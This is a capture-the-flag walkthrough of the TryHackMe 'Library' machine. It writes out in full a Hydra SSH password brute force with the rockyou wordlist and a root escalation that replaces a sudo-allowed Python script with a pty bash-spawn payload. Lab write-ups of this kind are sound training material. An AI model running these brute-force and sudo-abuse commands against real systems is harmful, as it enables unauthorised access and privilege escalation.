TryHackMe: Library
https://tryhackme.com/room/bsidesgtlibrary
Description
The Library is a Boot2Root machine for FIT and bsides guatemala CTF.
Gain a Flag
Enumeration
Nmap Scan
We see that theres two open Ports:
- 22/tcp ssh
- 80/tcp http
Port 80 is open, that mean we can view the Website
From the main page we can see the username meliodas, then let’s do further Enumerate with dirb. Using this command
1
dirb dir -u MACHINE_IP -w /usr/share/wordlists/dirb/common.txt
Then we found one dir that open : robots.txt
1
2
User-agent: rockyou
Disallow: /
What the user Flag ?
What we got so far :-
Username: meliodas
User-agent: rockyou
port 22 is open
So now maybe we can try to gain access from ssh with username meliodas. Now we need to brute force the password with hydra and rockyou wordlist. This is the command:-
1
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://MACHINE_IP -t 64
using the username and password with login to the machine and we get the initial shell with user flag and python file inside.
What the root Flag
inside the directory /home/meliodas/ we got two file:-
1
2
bak.py
user.txt
When we run the python file, it just do nothing… haha
First we run the command sudo -l, then we got this
1
2
User meliodas may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
The file can run using python by user meliodas, but we cannot edit the file as it has only read permissions.
to counter this mechanism, we remove the file then we create the same name file, like this
First we remove the bak.py:-
1
rm bak.py
And we create the a new file with our payload and run the file:-
1
2
3
touch bak.py
echo 'import pty; pty.spawn("/bin/bash")' > /home/meliodas/bak.py
sudo python /home/meliodas/bak.py
Now we run and we should get the root access with root flag.
Conclusion
Since the machine difficulty is easy, this machine is like normal Boot 2 Root. Good for beginner wo want to play Boot 2 Root.
Happy Hacking
